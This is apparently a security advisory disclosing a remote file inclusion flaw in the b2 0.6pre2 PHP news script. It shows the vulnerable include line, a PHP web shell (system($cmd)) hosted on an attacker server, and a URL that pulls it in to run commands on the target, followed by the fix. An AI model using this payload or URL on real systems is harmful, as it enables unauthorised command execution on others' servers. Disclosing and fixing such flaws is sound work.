b2 php remote command execution

[Frank <thran60 () hotmail com>]

Site: www.cafelog.com
Vulnerable:

b2 0.6pre2 and earlier.

B2 is a php script which allows webmasters to quikly post 
news on the frontpage and let viewers interact with 
eachother. A bug exists in the scripts which allows an 
attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php
 
*snippet*
 
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
 
*snippet*
 
But since b2config.php does not exist inside the directory, 
an attacker can define $b2inc himself.
So if the attacker creates a file on his server, for 
example www.attacker.com , called b2functions.php, and he 
writes the following in it :
 
<? 
system($cmd);
?>
 
(note : the attacker's server must not be able to run php, 
it has to open the file as text)
 
he can include the file like this :
 
http://www.vulnerablehost.com/b2/b2-
include/b2edit.showposts.php?b2inc=http://www.attacker.com&c
md=ls
 
This would execute the ls command on vulnerablehost.com.

Fix:
Copy b2config.php into the b2-include directory

The vendor has been warned, and already released the same 
fix a few days earlier.